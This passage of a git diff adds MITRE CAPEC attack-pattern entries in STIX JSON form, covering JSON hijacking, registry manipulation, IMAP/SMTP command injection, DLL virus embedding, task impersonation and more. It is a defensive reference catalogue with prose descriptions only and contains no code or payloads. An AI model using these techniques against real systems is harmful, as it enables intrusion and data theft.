"http://ha.ckers.org/blog/20090617/slowloris-http-dos/", + "external_id": "REF-406" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_prerequisites": [ + "HTTP protocol is usedWeb server used is vulnerable to denial of service via HTTP flooding" + ], + "x_capec_resources_required": [ + "Ability to issues hundreds of HTTP requests" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--c4d56080-ec8c-4df1-b3f3-3538c157595a.json b/capec/attack-pattern/attack-pattern--c4d56080-ec8c-4df1-b3f3-3538c157595a.json new file mode 100644 index 0000000000..b526d2a16c --- /dev/null +++ b/capec/attack-pattern/attack-pattern--c4d56080-ec8c-4df1-b3f3-3538c157595a.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--c001e2ef-e3ad-4afb-9787-85cbc24b3ac6", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--c4d56080-ec8c-4df1-b3f3-3538c157595a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Manipulate Registry Information", + "description": "An adversary exploits a weakness in authorization in order to modify content within a registry (e.g., Windows Registry, Mac plist, application registry). Editing registry information can permit the adversary to hide configuration information or remove indicators of compromise to cover up activity. Many applications utilize registries to store configuration and service information. As such, modification of registry information can affect individual services (affecting billing, authorization, or even allowing for identity spoofing) or the overall configuration of a targeted application. For example, both Java RMI and SOAP use registries to track available services. Changing registry values is sometimes a preliminary step towards completing another attack pattern, but given the long term usage of many registry values, manipulation of registry information could be its own end.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/203.html", + "external_id": "CAPEC-203" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/15.html", + "external_id": "CWE-15" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_example_instances": [ + "Manipulating registration information can be undertaken in advance of a path traversal attack (inserting relative path modifiers) or buffer overflow attack (enlarging a registry value beyond an application's ability to store it)." + ], + "x_capec_prerequisites": [ + "The targeted application must rely on values stored in a registry.", + "The adversary must have a means of elevating permissions in order to access and modify registry content through either administrator privileges (e.g., credentialed access), or a remote access tool capable of editing a registry through an API." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "The adversary requires privileged credentials or the development/acquiring of a tailored remote access tool." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--c565b674-66ce-418c-8611-0e2cfb445c42.json b/capec/attack-pattern/attack-pattern--c565b674-66ce-418c-8611-0e2cfb445c42.json new file mode 100644 index 0000000000..09e44fdcfc --- /dev/null +++ b/capec/attack-pattern/attack-pattern--c565b674-66ce-418c-8611-0e2cfb445c42.json @@ -0,0 +1,65 @@ +{ + "type": "bundle", + "id": "bundle--cc8a9077-13ac-4297-b76b-ad8cfa03dc2c", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--c565b674-66ce-418c-8611-0e2cfb445c42", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "JSON Hijacking (aka JavaScript Hijacking)", + "description": "An attacker targets a system that uses JavaScript Object Notation (JSON) as a transport mechanism between the client and the server (common in Web 2.0 systems using AJAX) to steal possibly confidential information transmitted from the server back to the client inside the JSON object by taking advantage of the loophole in the browser's Same Origin Policy that does not prohibit JavaScript from one website to be included and executed in the context of another website. An attacker gets the victim to visit his or her malicious page that contains a script tag whose source points to the vulnerable system with a URL that requests a response from the server containing a JSON object with possibly confidential information. The malicious page also contains malicious code to capture the JSON object returned by the server before any other processing on it can take place, typically by overriding the JavaScript function used to create new objects. This hook allows the malicious code to get access to the creation of each object and transmit the possibly sensitive contents of the captured JSON object to the attackers' server. There is nothing in the browser's security model to prevent the attackers' malicious JavaScript code (originating from attacker's domain) to set up an environment (as described above) to intercept a JSON object response (coming from the vulnerable target system's domain), read its contents and transmit to the attackers' controlled site. The same origin policy protects the domain object model (DOM), but not the JSON.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/111.html", + "external_id": "CAPEC-111" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html", + "external_id": "CWE-345" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html", + "external_id": "CWE-346" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/352.html", + "external_id": "CWE-352" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_example_instances": [ + "\n Gmail service was found to be vulnerable to a JSON Hijacking attack that enabled an attacker to get the contents of the victim's address book. An attacker could send an e-mail to the victim's Gmail account (which ensures that the victim is logged in to Gmail when he or she receives it) with a link to the attackers' malicious site. If the victim clicked on the link, a request (containing the victim's authenticated session cookie) would be sent to the Gmail servers to fetch the victim's address book. This functionality is typically used by the Gmail service to get this data on the fly so that the user can be provided a list of contacts from which to choose the recipient of the e-mail.\n When the JSON object with the contacts came back, it was loaded into the JavaScript space via a script tag on the attackers' malicious page. Since the JSON object was never assigned to a local variable (which would have prevented a script from a different domain accessing it due to the browser's same origin policy), another mechanism was needed to access the data that it contained. That mechanism was overwriting the internal array constructor with the attackers' own constructor in order to gain access to the JSON object's contents. These contents could then be transferred to the site controlled by the attacker.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "JSON is used as a transport mechanism between the client and the server", + "The target server cannot differentiate real requests from forged requests", + "The JSON object returned from the server can be accessed by the attackers' malicious code via a script tag" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Medium": "Once this attack pattern is developed and understood, creating an exploit is not very complex.The attacker needs to have knowledge of the URLs that need to be accessed on the target system to request the JSON objects." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--c6374b68-b20c-4137-940c-37adee6651fa.json b/capec/attack-pattern/attack-pattern--c6374b68-b20c-4137-940c-37adee6651fa.json new file mode 100644 index 0000000000..0ad2acada2 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--c6374b68-b20c-4137-940c-37adee6651fa.json @@ -0,0 +1,73 @@ +{ + "type": "bundle", + "id": "bundle--82a331e9-0369-4c9b-8672-6ae392c38683", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--c6374b68-b20c-4137-940c-37adee6651fa", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP 'RST' Flag Checksum Probe", + "description": "This OS fingerprinting probe performs a checksum on any ASCII data contained within the data portion or a RST packet. Some operating systems will report a human-readable text message in the payload of a 'RST' (reset) packet when specific types of connection errors occur. RFC 1122 allows text payloads within reset packets but not all operating systems or routers implement this functionality.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/328.html", + "external_id": "CAPEC-328" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "url": "http://www.faqs.org/rfcs/rfc793.html", + "external_id": "REF-128" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--c66c234d-6d33-48c6-a9c5-4113a92ac8a8.json b/capec/attack-pattern/attack-pattern--c66c234d-6d33-48c6-a9c5-4113a92ac8a8.json new file mode 100644 index 0000000000..e2fb39873c --- /dev/null +++ b/capec/attack-pattern/attack-pattern--c66c234d-6d33-48c6-a9c5-4113a92ac8a8.json @@ -0,0 +1,36 @@ +{ + "type": "bundle", + "id": "bundle--260f8b76-5c51-49b5-9a00-c5157406d4e8", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--c66c234d-6d33-48c6-a9c5-4113a92ac8a8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "Influence via Modes of Thinking", + "description": "The adversary tailors their communication to the language and thought patterns of the target thereby weakening barriers or reluctance to communication. This method is a way of building rapport with a target by matching their speech patterns and the primary ways or dominant senses with which they make abstractions. This technique can be used to make the target more receptive to sharing information because the adversary has adapted their communication forms to match those of the target. When skillfully employed, the target is likely to be unaware that they are being manipulated.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/428.html", + "external_id": "CAPEC-428" + }, + { + "source_name": "reference_from_CAPEC", + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "url": "http://www.social-engineer.org", + "external_id": "REF-348" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--c6b83de3-eda5-445c-8a41-cd0bedd34b2c.json b/capec/attack-pattern/attack-pattern--c6b83de3-eda5-445c-8a41-cd0bedd34b2c.json new file mode 100644 index 0000000000..4f45ecef94 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--c6b83de3-eda5-445c-8a41-cd0bedd34b2c.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--963548e9-04b0-4d19-9577-56c82d1109a2", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--c6b83de3-eda5-445c-8a41-cd0bedd34b2c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Security Software Footprinting", + "description": "Adversaries may attempt to get a listing of security tools that are installed on the system and their configurations. This may include security related system features (such as a built-in firewall or anti-spyware) as well as third-party security software.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/581.html", + "external_id": "CAPEC-581" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--c87d3ca8-4b1a-4711-a2b9-07f413c986ef.json b/capec/attack-pattern/attack-pattern--c87d3ca8-4b1a-4711-a2b9-07f413c986ef.json new file mode 100644 index 0000000000..75f4ca3d27 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--c87d3ca8-4b1a-4711-a2b9-07f413c986ef.json @@ -0,0 +1,66 @@ +{ + "type": "bundle", + "id": "bundle--130ef261-18b4-4f44-835d-04f673a74e10", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--c87d3ca8-4b1a-4711-a2b9-07f413c986ef", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Block Access to Libraries", + "description": "An application typically makes calls to functions that are a part of libraries external to the application. These libraries may be part of the operating system or they may be third party libraries. It is possible that the application does not handle situations properly where access to these libraries has been blocked. Depending on the error handling within the application, blocked access to libraries may leave the system in an insecure state that could be leveraged by an attacker.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/96.html", + "external_id": "CAPEC-96" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/589.html", + "external_id": "CWE-589" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/227.html", + "external_id": "CWE-227" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Availability": [ + "Alter Execution Logic" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism" + ] + }, + "x_capec_example_instances": [ + "A web-based system uses a third party cryptographic random number generation library that derives entropy from machine's hardware. This library is used in generation of user session ids used by the application. If the library is inaccessible, the application instead uses a software based weak pseudo random number generation library. An attacker of the system blocks access of the application to the third party cryptographic random number generation library (by renaming it). The application in turn uses the weak pseudo random number generation library to generate session ids that are predictable. An attacker then leverages this weakness to guess a session id of another user to perform a horizontal elevation of privilege escalation and gain access to another user's account." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "An application requires access to external libraries.", + "An attacker has the privileges to block application access to external libraries." + ], + "x_capec_skills_required": { + "Low": "Knowledge of how to block access to libraries, as well as knowledge of how to leverage the resulting state of the application based on the failed call." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--c8c5d454-e4e2-4c3f-9969-6280319b6d25.json b/capec/attack-pattern/attack-pattern--c8c5d454-e4e2-4c3f-9969-6280319b6d25.json new file mode 100644 index 0000000000..ae5eb8bc28 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--c8c5d454-e4e2-4c3f-9969-6280319b6d25.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--a686debc-b755-45e4-9293-5d2ba341f4bc", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--c8c5d454-e4e2-4c3f-9969-6280319b6d25", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-01-12T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "DNS Blocking", + "description": "An adversary intercepts traffic and intentionally drops DNS requests based on content in the request. In this way, the adversary can deny the availability of specific services or content to the user even if the IP address is changed.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/589.html", + "external_id": "CAPEC-589" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html", + "external_id": "CWE-300" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Censorship in the Wild: Analyzing Internet Filtering in Syria, 2014, Sigcomm", + "url": "http://conferences2.sigcomm.org/imc/2014/papers/p285.pdf", + "external_id": "REF-473" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Availability": [ + "Other (Preventing DNS from resolving a request denies the availability of a target site or service for the user.)" + ] + }, + "x_capec_example_instances": [ + "\n Full URL Based Filtering: Filtering based upon the requested URL.\n URL String-based Filtering: Filtering based upon the use of particular strings included in the requested URL.\n " + ], + "x_capec_prerequisites": [ + "This attack requires the ability to conduct deep packet inspection with an In-Path device that can drop the targeted traffic and/or connection." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--c9cacee8-0f24-4a36-8245-d1db21932188.json b/capec/attack-pattern/attack-pattern--c9cacee8-0f24-4a36-8245-d1db21932188.json new file mode 100644 index 0000000000..350af0de04 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--c9cacee8-0f24-4a36-8245-d1db21932188.json @@ -0,0 +1,40 @@ +{ + "type": "bundle", + "id": "bundle--6b33c33b-0976-4446-9a06-807b7ffd062b", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--c9cacee8-0f24-4a36-8245-d1db21932188", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Task Impersonation", + "description": "An adversary, through a previously installed malicious application, monitors the task list maintained by the operating system and waits for a specific legitimate task to become active. Once the task is detected, the malicious application launches a new task in the foreground that mimics the user interface of the legitimate task. At this point, the user thinks that they are interacting with the legitimate task that they started, but instead they are interacting with the malicious application. This type of attack is most often used to obtain sensitive information (e.g., credentials) from the user. Once the adversary's goal is reached, the malicious application can exit, leaving the original trusted application visible and the appearance that nothing out of the ordinary has occurred.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/504.html", + "external_id": "CAPEC-504" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1021.html", + "external_id": "CWE-1021" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Adrienne Porter Felt, David Wagner, Phishing on Mobile Devices, 2011, University of California, Berkeley", + "url": "https://people.eecs.berkeley.edu/~daw/papers/mobphish-w2sp11.pdf", + "external_id": "REF-434" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--ca2982ef-3471-481a-ae9d-96c968854e2b.json b/capec/attack-pattern/attack-pattern--ca2982ef-3471-481a-ae9d-96c968854e2b.json new file mode 100644 index 0000000000..1cfe7f1509 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--ca2982ef-3471-481a-ae9d-96c968854e2b.json @@ -0,0 +1,41 @@ +{ + "type": "bundle", + "id": "bundle--31250f51-32ff-447e-8b6f-1470de90efdd", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--ca2982ef-3471-481a-ae9d-96c968854e2b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Input Data Manipulation", + "description": "An attacker exploits a weakness in input validation by controlling the format, structure, and composition of data to an input-processing interface. By supplying input of a non-standard or unexpected form an attacker can adversely impact the security of the target. For example, using a different character encoding might cause dangerous text to be treated as safe text. Alternatively, the attacker may use certain flags, such as file extensions, to make a target application believe that provided data should be handled using a certain interpreter when the data is not actually of the appropriate type. This can lead to bypassing protection mechanisms, forcing the target to use specific components for input processing, or otherwise causing the user's data to be handled differently than might otherwise be expected. This attack differs from Variable Manipulation in that Variable Manipulation attempts to subvert the target's processing through the value of the input while Input Data Manipulation seeks to control how the input is processed.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/153.html", + "external_id": "CAPEC-153" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_prerequisites": [ + "The target must accept user data for processing and the manner in which this data is processed must depend on some aspect of the format or flags that the attacker can control." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--ca63b113-8230-4bbc-950f-70fc57e70017.json b/capec/attack-pattern/attack-pattern--ca63b113-8230-4bbc-950f-70fc57e70017.json new file mode 100644 index 0000000000..083a23fdda --- /dev/null +++ b/capec/attack-pattern/attack-pattern--ca63b113-8230-4bbc-950f-70fc57e70017.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--0422c957-28f8-4ff1-b1b4-f80b65fdb454", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--ca63b113-8230-4bbc-950f-70fc57e70017", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "IMAP/SMTP Command Injection", + "description": "An attacker exploits weaknesses in input validation on IMAP/SMTP servers to execute commands on the server. Web-mail servers often sit between the Internet and the IMAP or SMTP mail server. User requests are received by the web-mail servers which then query the back-end mail server for the requested information and return this response to the user. In an IMAP/SMTP command injection attack, mail-server commands are embedded in parts of the request sent to the web-mail server. If the web-mail server fails to adequately sanitize these requests, these commands are then sent to the back-end mail server when it is queried by the web-mail server, where the commands are then executed. This attack can be especially dangerous since administrators may assume that the back-end server is protected against direct Internet access and therefore may not secure it adequately against the execution of malicious commands.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/183.html", + "external_id": "CAPEC-183" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/77.html", + "external_id": "CWE-77" + }, + { + "source_name": "reference_from_CAPEC", + "description": "OWASP Testing Guide (v4 [DRAFT]), The Open Web Application Security Project (OWASP)", + "url": "http://www.owasp.org/index.php/Testing_for_IMAP/SMTP_Injection_(OWASP-DV-011)", + "external_id": "REF-49" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_prerequisites": [ + "The target environment must consist of a web-mail server that the attacker can query and a back-end mail server. The back-end mail server need not be directly accessible to the attacker.", + "The web-mail server must fail to adequately sanitize fields received from users and passed on to the back-end mail server.", + "The back-end mail server must not be adequately secured against receiving malicious commands from the web-mail server." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. However, in most cases, the attacker will need to be a recognized user of the web-mail server." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--caf7f8c9-fcce-477a-b6af-09052bd6ecca.json b/capec/attack-pattern/attack-pattern--caf7f8c9-fcce-477a-b6af-09052bd6ecca.json new file mode 100644 index 0000000000..3751ca4930 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--caf7f8c9-fcce-477a-b6af-09052bd6ecca.json @@ -0,0 +1,39 @@ +{ + "type": "bundle", + "id": "bundle--39b9c75a-9aeb-42f5-8c0e-37c9a866024b", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--caf7f8c9-fcce-477a-b6af-09052bd6ecca", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Embed Virus into DLL", + "description": "An adversary tampers with a DLL and embeds a computer virus into gaps between legitimate machine instructions. These gaps may be the result of compiler optimizations that pad memory blocks for performance gains. The embedded virus then attempts to infect any machine which interfaces with the product, and possibly steal private data or eavesdrop.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/448.html", + "external_id": "CAPEC-448" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Access to the software currently deployed at a victim location. This access is often obtained by leveraging another attack pattern to gain permissions that the adversary wouldn't normally have." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--cb05a77d-c1ac-41b4-8df1-a4b31cb1fef8.json b/capec/attack-pattern/attack-pattern--cb05a77d-c1ac-41b4-8df1-a4b31cb1fef8.json new file mode 100644 index 0000000000..51140968b1 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--cb05a77d-c1ac-41b4-8df1-a4b31cb1fef8.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--21ef7e62-0f39-445e-8949-7752aa9c728f", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--cb05a77d-c1ac-41b4-8df1-a4b31cb1fef8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Explore for Predictable Temporary File Names", + "description": "An attacker explores a target to identify the names and locations of predictable temporary files for the purpose of launching further attacks against the target. This involves analyzing naming conventions and storage locations of the temporary files created by a target application. If an attacker can predict the names of temporary files they can use this information to mount other attacks, such as information gathering and symlink attacks.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/149.html", + "external_id": "CAPEC-149" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_prerequisites": [ + "The targeted application must create names for temporary files using a predictable procedure, e.g. using sequentially increasing numbers.", + "The attacker must be able to see the names of the files the target is creating." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--cb1233cb-0ef8-4ca4-b2e7-ada9e5f175d8.json b/capec/attack-pattern/attack-pattern--cb1233cb-0ef8-4ca4-b2e7-ada9e5f175d8.json new file mode 100644 index 0000000000..3edbf25036 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--cb1233cb-0ef8-4ca4-b2e7-ada9e5f175d8.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--a196d89a-584b-4fa2-b171-eeae343773af", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--cb1233cb-0ef8-4ca4-b2e7-ada9e5f175d8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Global variable manipulation", + "description": "This attack pattern has been deprecated as it is a duplicate of the existing attack pattern \"CAPEC-77 : Manipulating User-Controlled Variables\". Please refer to this other CAPEC going forward.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/265.html", + "external_id": "CAPEC-265" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--cc415b90-60a3-4ec4-a8a8-2ede6772cbdf.json b/capec/attack-pattern/attack-pattern--cc415b90-60a3-4ec4-a8a8-2ede6772cbdf.json new file mode 100644 index 0000000000..9e4473f5be --- /dev/null +++ b/capec/attack-pattern/attack-pattern--cc415b90-60a3-4ec4-a8a8-2ede6772cbdf.json @@ -0,0 +1,69 @@ +{ + "type": "bundle", + "id": "bundle--e64cb3ab-f8b7-4234-8d6b-9c0b956549f1", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--cc415b90-60a3-4ec4-a8a8-2ede6772cbdf", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Encryption Brute Forcing", + "description": "An attacker, armed with the cipher text and the encryption algorithm used, performs an exhaustive (brute force) search on the key space to determine the key that decrypts the cipher text to obtain the plaintext.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/20.html", + "external_id": "CAPEC-20" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/326.html", + 